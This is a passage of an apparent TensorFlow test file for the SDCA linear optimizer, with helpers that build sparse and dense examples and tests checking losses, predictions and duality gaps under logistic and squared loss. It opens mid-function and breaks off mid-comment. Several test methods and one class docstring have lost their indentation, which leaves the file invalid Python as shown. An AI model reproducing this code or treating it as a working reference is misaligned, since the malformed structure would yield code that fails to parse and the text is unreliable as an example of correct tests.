  def parse_examples(example_protos):
    # Feature spec: a fixed-length float target plus variable-length
    # age/gender sparse index and value lists.
    features = {
        'target':
            parsing_ops.FixedLenFeature(
                shape=[1], dtype=dtypes.float32, default_value=0),
        'age_indices':
            parsing_ops.VarLenFeature(dtype=dtypes.int64),
        'age_values':
            parsing_ops.VarLenFeature(dtype=dtypes.float32),
        'gender_indices':
            parsing_ops.VarLenFeature(dtype=dtypes.int64),
        'gender_values':
            parsing_ops.VarLenFeature(dtype=dtypes.float32)
    }
    return parsing_ops.parse_example(
        [e.SerializeToString() for e in example_protos], features)

  parsed = parse_examples(example_protos)

  sparse_features = [
      _SparseFeatureColumn(
          # First column of the SparseTensor indices = example ids.
          array_ops.reshape(
              array_ops.split(
                  value=parsed['age_indices'].indices,
                  num_or_size_splits=2,
                  axis=1)[0], [-1]),
          array_ops.reshape(parsed['age_indices'].values, [-1]),
          array_ops.reshape(parsed['age_values'].values, [-1])),
      _SparseFeatureColumn(
          array_ops.reshape(
              array_ops.split(
                  value=parsed['gender_indices'].indices,
                  num_or_size_splits=2,
                  axis=1)[0], [-1]),
          array_ops.reshape(parsed['gender_indices'].values, [-1]),
          array_ops.reshape(parsed['gender_values'].values, [-1]))
  ]

  return dict(
      sparse_features=sparse_features,
      dense_features=[],
      example_weights=example_weights,
      example_labels=array_ops.reshape(parsed['target'], [-1]),
      example_ids=['%d' % i for i in range(0, len(example_protos))])
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
  """Generate random examples plus a matching zero-initialized weight var.

  Each example activates exactly *num_non_zero* features, with values
  num_non_zero**-0.5 so every example's feature vector has unit L2 norm.
  """
  random.seed(1)  # keep the generated data reproducible across runs

  sparse_features = [
      _SparseFeatureColumn(
          [i for i in range(num_examples) for _ in range(num_non_zero)], [
              i for _ in range(num_examples)
              for i in random.sample(range(dim), num_non_zero)
          ],
          [num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)])
  ]
  examples_dict = dict(
      sparse_features=sparse_features,
      dense_features=[],
      example_weights=[random.random() for _ in range(num_examples)],
      example_labels=[
          1. if random.random() > 0.5 else 0. for _ in range(num_examples)
      ],
      example_ids=[str(i) for i in range(num_examples)])

  weights = variables_lib.VariableV1(
      array_ops.zeros([dim], dtype=dtypes.float32))
  variables_dict = dict(
      sparse_features_weights=[weights],
      dense_features_weights=[])

  return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, num_shards=None, partitioned=False):
  """Create zero-initialized age/gender weight variables for the tests.

  When *partitioned* is True the variables are created under a 2-way
  fixed-size partitioner, yielding PartitionedVariables.
  """
  # TODO(dbaylor):  Figure out how to derive max_age & max_gender from
  # examples_dict.
  partitioner = None
  if partitioned:
    partitioner = partitioned_variables.fixed_size_partitioner(num_shards=2,
                                                               axis=0)
  # Scope the variables per shard count so repeated calls don't collide.
  with variable_scope.variable_scope(
      name_or_scope=('variables/shard_{}'.format(num_shards)
                     if num_shards else 'variables'),
      partitioner=partitioner):
    age_weights = variable_scope.get_variable(
        name='age',
        initializer=array_ops.zeros([max_age + 1], dtype=dtypes.float32))
    gender_weights = variable_scope.get_variable(
        name='gender',
        initializer=array_ops.zeros([max_gender + 1], dtype=dtypes.float32))
  return dict(
      sparse_features_weights=[age_weights, gender_weights],
      dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
                                            labels):
  """Creates examples and variables dictionaries for dense features.

  Variables shapes are inferred from the list of dense feature values passed as
  argument.

  Args:
    dense_features_values: The values of the dense features
    weights: The example weights.
    labels: The example labels.
  Returns:
    One dictionary for the examples and one for the variables.
  """
  dense_tensors = []
  dense_weights = []
  for dense_feature in dense_features_values:
    dense_tensor = ops.convert_to_tensor(dense_feature, dtype=dtypes.float32)
    check_shape_op = control_flow_ops.Assert(
        math_ops.less_equal(array_ops.rank(dense_tensor), 2),
        ['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
    # Reshape to [batch_size, dense_column_dimension].
    with ops.control_dependencies([check_shape_op]):
      dense_tensor = array_ops.reshape(
          dense_tensor, [dense_tensor.get_shape().as_list()[0], -1])
    dense_tensors.append(dense_tensor)
    # Add variables of shape [feature_column_dimension].
    dense_weights.append(
        variables_lib.VariableV1(
            array_ops.zeros(
                [dense_tensor.get_shape().as_list()[1]], dtype=dtypes.float32)))

  examples_dict = dict(
      sparse_features=[],
      dense_features=dense_tensors,
      example_weights=weights,
      example_labels=labels,
      example_ids=['%d' % i for i in range(0, len(labels))])
  variables_dict = dict(
      sparse_features_weights=[], dense_features_weights=dense_weights)

  return examples_dict, variables_dict
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
  """Threshold sigmoid outputs at *cutoff*, returning int32 0/1 labels."""
  threshold = array_ops.ones_like(predictions) * cutoff
  return math_ops.cast(
      math_ops.greater_equal(predictions, threshold), dtype=dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
  """Map raw hinge scores to int32 0/1 labels (nonnegative -> 1)."""
  zeros = array_ops.zeros_like(predictions)
  return math_ops.cast(
      math_ops.greater_equal(predictions, zeros), dtype=dtypes.int32)
# TODO(pmol): Refactor tests to avoid repetition of boilerplate code.
class _SDCAModelTest(TensorFlowTestCase):
  """Base SDCA optimizer test class for any loss type."""

  def _single_threaded_test_session(self):
    """Return a CPU-only test session restricted to one thread of each kind."""
    session_config = config_pb2.ConfigProto(
        inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
    return self.test_session(use_gpu=False, config=session_config)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLogisticLossTest(_SDCAModelTest):
"""SDCA optimizer test class for logistic loss."""
  def testSimple(self):
    """SDCA with logistic loss converges near the known optimum."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')

        lr = _SDCAModel(examples, variables, options)
        variables_lib.global_variables_initializer().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        # With zero weights both losses equal ln(2).
        self.assertAllClose(0.693147, unregularized_loss.eval())
        self.assertAllClose(0.693147, loss.eval())
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # The high tolerance in unregularized_loss comparisons is due to the
        # fact that it's possible to trade off unregularized_loss vs.
        # regularization and still have a sum that is quite close to the
        # optimal regularized_loss value.  SDCA's duality gap only ensures that
        # the regularized_loss is within 0.01 of optimal.
        # 0.525457 is the optimal regularized_loss.
        # 0.411608 is the unregularized_loss at that optimum.
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
  def testPartitionedPrimals(self):
    """Same as testSimple, but with partitioned primal weight variables."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        # partitioned=True exercises PartitionedVariable primals.
        variables = make_variable_dict(1, 1, num_shards, partitioned=True)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')

        lr = _SDCAModel(examples, variables, options)
        variables_lib.global_variables_initializer().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        # With zero weights both losses equal ln(2).
        self.assertAllClose(0.693147, unregularized_loss.eval())
        self.assertAllClose(0.693147, loss.eval())
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # The high tolerance in unregularized_loss comparisons is due to the
        # fact that it's possible to trade off unregularized_loss vs.
        # regularization and still have a sum that is quite close to the
        # optimal regularized_loss value.  SDCA's duality gap only ensures that
        # the regularized_loss is within 0.01 of optimal.
        # 0.525457 is the optimal regularized_loss.
        # 0.411608 is the unregularized_loss at that optimum.
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
  def testSomePartitionedPrimals(self):
    """Mixes a plain Variable with a PartitionedVariable for the primals."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [0],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        # Explicitly make age a [1]-shaped Variable (which cannot be
        # partitioned), while making gender a PartitionedVariable.
        age_weights = variables_lib.VariableV1(
            array_ops.zeros([1], dtype=dtypes.float32))
        with variable_scope.variable_scope(
            name_or_scope=('variables/shard_{}'.format(num_shards)
                           if num_shards else 'variables'),
            partitioner=partitioned_variables.fixed_size_partitioner(
                num_shards=2, axis=0)):
          gender_weights = variable_scope.get_variable(
              name='gender',
              initializer=array_ops.zeros([2], dtype=dtypes.float32))
        variables = dict(
            sparse_features_weights=[age_weights, gender_weights],
            dense_features_weights=[])
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        variables_lib.global_variables_initializer().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        # With zero initial weights both losses equal log(2) = 0.693147.
        self.assertAllClose(0.693147, unregularized_loss.eval())
        self.assertAllClose(0.693147, loss.eval())
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # The high tolerance in unregularized_loss comparisons is due to the
        # fact that it's possible to trade off unregularized_loss vs.
        # regularization and still have a sum that is quite close to the
        # optimal regularized_loss value. SDCA's duality gap only ensures that
        # the regularized_loss is within 0.01 of optimal.
        # 0.593014 is the optimal regularized_loss.
        # 0.512591 is the unregularized_loss at that optimum.
        # (NOTE(review): the previous comment had these two values attributed
        # the other way round, copied from testPartitionedPrimals; the
        # assertions below show regularized=0.593014, unregularized=0.512591.)
        self.assertAllClose(0.512591, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.593014, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSparseRandom(self):
dim = 20
num_examples = 1000
# Number of non-zero features per example.
non_zeros = 10
# Setup test data.
with self._single_threaded_test_session():
examples, variables = make_random_examples_and_variables_dicts(
num_examples, dim, non_zeros)
options = dict(
symmetric_l2_regularization=.1,
symmetric_l1_regularization=0,
num_table_shards=1,
adaptive=False,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
for _ in range(10):
train_op.run()
lr.update_weights(train_op).run()
self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-2)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'Duplicate'):
train_op.run()
  def testDistributedSimple(self):
    """Runs SDCA concurrently from several worker threads.

    Distributed SDCA may not converge if the workers update concurrently the
    same example. In this test the examples are partitioned across workers.
    The examples are the same for all workers, just the example_ids are
    different.
    """
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    examples = make_example_dict(example_protos, example_weights)
    # example_ids is a placeholder so each worker can feed a disjoint id set.
    example_ids = array_ops.placeholder(
        dtypes.string, shape=(len(example_weights),))
    examples['example_ids'] = example_ids
    variables = make_variable_dict(1, 1)
    # We need each thread to keep its own device stack or the device scopes
    # won't be properly nested.
    ops.get_default_graph().switch_to_thread_local()
    for num_shards in _SHARD_NUMBERS:
      for num_loss_partitions in _NUM_LOSS_PARTITIONS:
        with self._single_threaded_test_session():
          options = dict(
              # Keep the same solution as for TestSimple: since the number of
              # examples is multiplied by num_loss_partitions, multiply also
              # L2 by the same value.
              symmetric_l2_regularization=num_loss_partitions,
              symmetric_l1_regularization=0,
              loss_type='logistic_loss',
              num_table_shards=num_shards,
              num_loss_partitions=num_loss_partitions)
          lr = _SDCAModel(examples, variables, options)
          variables_lib.global_variables_initializer().run()
          unregularized_loss = lr.unregularized_loss(examples)
          loss = lr.regularized_loss(examples)
          predictions = lr.predictions(examples)
          # With zero initial weights both losses equal log(2) = 0.693147.
          self.assertAllClose(0.693147, unregularized_loss.eval())
          self.assertAllClose(0.693147, loss.eval())
          train_op = lr.minimize()

          def minimize(worker_id):
            # Each worker trains on its own disjoint set of example ids.
            with context.graph_mode(), self._single_threaded_test_session():
              feed_dict = {example_ids: [
                  str(i + worker_id*len(example_weights)) for i in range(
                      len(example_weights))]}
              for _ in range(_MAX_ITERATIONS):
                train_op.run(feed_dict=feed_dict)  # pylint: disable=cell-var-from-loop

          threads = []
          for worker_id in range(num_loss_partitions):
            threads.append(threading.Thread(target=minimize, args=(worker_id,)))
            threads[-1].start()

          for t in threads:
            t.join()

          lr.update_weights(train_op).run(feed_dict={
              example_ids: [str(i) for i in range(len(example_weights))]})

          # Test only the unregularized loss because the optimal value of the
          # regularized loss depends on num_loss_partitions.
          self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
          predicted_labels = get_binary_predictions_for_logistic(predictions)
          self.assertAllEqual([0, 1], predicted_labels.eval())
          self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
def testSimpleNoL2(self):
# L2 regularization of SDCA should be positive.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, 1)
options = dict(
symmetric_l2_regularization=0,
symmetric_l1_regularization=0,
num_table_shards=1,
loss_type='logistic_loss')
with self.assertRaises(ValueError):
_SDCAModel(examples, variables, options)
  def testSomeUnweightedExamples(self):
    """Zero-weight examples must be ignored during training."""
    # Setup test data with 4 examples, but should produce the same
    # results as testSimple.
    example_protos = [
        # Will be used.
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        # Will be ignored.
        make_example_proto({
            'age': [1],
            'gender': [0]
        }, 0),
        # Will be used.
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
        # Will be ignored.
        make_example_proto({
            'age': [1],
            'gender': [0]
        }, 1),
    ]
    example_weights = [1.0, 0.0, 1.0, 0.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        # Only use examples 0 and 2
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        variables_lib.global_variables_initializer().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # Same optimum as testSimple, since only the weighted examples count.
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
        self.assertAllClose(
            0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testFractionalExampleLabel(self):
# Setup test data with 1 positive, and 1 mostly-negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0.1),
make_example_proto({
'age': [1],
'gender': [1]
}, 0.9),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
with self.assertRaisesOpError(
'Only labels of 0.0 or 1.0 are supported right now.'):
lr.minimize().run()
  def testImbalanced(self):
    """Trains on a class-imbalanced dataset (1 positive, 3 negatives)."""
    # Setup test data with 1 positive, and 3 negative examples.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [2],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [3],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0, 1.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(3, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        variables_lib.global_variables_initializer().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        # Expected values are sums of two per-group contributions.
        self.assertAllClose(
            0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
        self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
  def testImbalancedWithExampleWeights(self):
    """Uses unequal example weights (3:1) on a two-example dataset."""
    # Setup test data with 1 positive, and 1 negative example.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [3.0, 1.0]
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        variables_lib.global_variables_initializer().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
        self.assertAllClose(0.408044, loss.eval(), atol=0.012)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        self.assertAllEqual([0, 1], predicted_labels.eval())
        self.assertAllClose(
            0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
  def testInstancesOfOneClassOnly(self):
    """Trains when only one class effectively remains after weighting."""
    # Setup test data with 1 positive (ignored), and 1 negative example.
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [0]
        }, 1),  # Shares gender with the instance above.
    ]
    example_weights = [1.0, 0.0]  # Second example "omitted" from training.
    for num_shards in _SHARD_NUMBERS:
      with self._single_threaded_test_session():
        examples = make_example_dict(example_protos, example_weights)
        variables = make_variable_dict(1, 1, num_shards)
        options = dict(
            symmetric_l2_regularization=1,
            symmetric_l1_regularization=0,
            num_table_shards=num_shards,
            loss_type='logistic_loss')
        lr = _SDCAModel(examples, variables, options)
        variables_lib.global_variables_initializer().run()
        unregularized_loss = lr.unregularized_loss(examples)
        loss = lr.regularized_loss(examples)
        predictions = lr.predictions(examples)
        train_op = lr.minimize()
        for _ in range(_MAX_ITERATIONS):
          train_op.run()
        lr.update_weights(train_op).run()
        self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
        self.assertAllClose(0.525457, loss.eval(), atol=0.01)
        predicted_labels = get_binary_predictions_for_logistic(predictions)
        # Both examples predicted negative: the shared gender feature drags
        # the (unweighted) second example to class 0 as well.
        self.assertAllEqual([0, 0], predicted_labels.eval())
        self.assertAllClose(
            0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'indices.*'):
train_op.run()
  def testOutOfRangeDenseFeatures(self):
    """More dense feature columns than weights must raise at run time."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
          weights=[20.0, 10.0],
          labels=[1.0, 0.0])
      # Replace with a variable of size 1 instead of 2.
      variables['dense_features_weights'] = [
          variables_lib.VariableV1(array_ops.zeros(
              [1], dtype=dtypes.float32))
      ]
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='logistic_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      train_op = lr.minimize()
      with self.assertRaisesRegexp(
          errors_impl.InvalidArgumentError,
          'More dense features than we have parameters for.*'):
        train_op.run()
  def testMissingFeature(self):
    """An example with an empty feature column should still train fine."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
        # Third example has no 'age' feature at all.
        make_example_proto({
            'age': [],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1, 1)
      options = dict(
          symmetric_l2_regularization=1,
          symmetric_l1_regularization=0,
          num_table_shards=1,
          loss_type='logistic_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      unregularized_loss = lr.unregularized_loss(examples)
      # With zero initial weights the loss equals log(2) = 0.693147.
      self.assertAllClose(0.693147, unregularized_loss.eval())
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()
      self.assertAllClose(
          0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)

  # TODO(katsiaspis): add a test for the case when examples at the end of an
  # epoch are repeated, since example id may be duplicated.
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLinearLossTest(_SDCAModelTest):
  """SDCA optimizer test class for linear (squared) loss."""

  def testSimple(self):
    """Regularized squared loss shrinks predictions to 2/3 of the labels."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = lr.predictions(examples)
      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()

      # Predictions should be 2/3 of label due to minimizing regularized loss:
      #   (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
      self.assertAllClose(
          [-20.0 / 3.0, 28.0 / 3.0], predictions.eval(), rtol=0.005)
      # Approximate gap should be very close to 0.0. (In fact, because the gap
      # is only approximate, it is likely that upon convergence the duality gap
      # can have a tiny negative value).
      self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)

  def testL2Regularization(self):
    """A large L2 regularizer shrinks predictions to 1/5 of the labels."""
    # Setup test data
    example_protos = [
        # 2 identical examples
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        # 2 more identical examples
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
    ]
    example_weights = [1.0, 1.0, 1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=16,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = lr.predictions(examples)

      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()

      # Predictions should be 1/5 of label due to minimizing regularized loss:
      #   (label - 2 * weight)^2 + L2 * 16 * weight^2
      optimal1 = -10.0 / 5.0
      optimal2 = 14.0 / 5.0
      self.assertAllClose(
          [optimal1, optimal1, optimal2, optimal2],
          predictions.eval(),
          rtol=0.01)

  def testL1Regularization(self):
    """L1 regularization pulls the optimum away from the pure-L2 solution."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=4.0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      prediction = lr.predictions(examples)
      loss = lr.regularized_loss(examples)

      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()

      # Predictions should be -4, 20/3 due to minimizing regularized loss:
      #   (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2 + L1 * 4 * weight
      self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
      # Loss should be the sum of the regularized loss value from above per
      # example after plugging in the optimal weights.
      self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)

  def testFeatureValues(self):
    """Non-unit feature values and example weights scale the optimum."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, -10.0, -2.0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 14.0, 2.0),
    ]
    example_weights = [5.0, 3.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = lr.predictions(examples)

      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()

      # There are 4 (sparse) variable weights to be learned. 2 for age and 2
      # for gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights,
      # y_1, y_2 be the labels for examples 1 and 2 respectively and s_1, s_2
      # the corresponding *example* weights. With the given feature values, the
      # loss function is given by:
      #   s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
      #   + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2).
      # Solving for the optimal, it can be verified that:
      #   w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
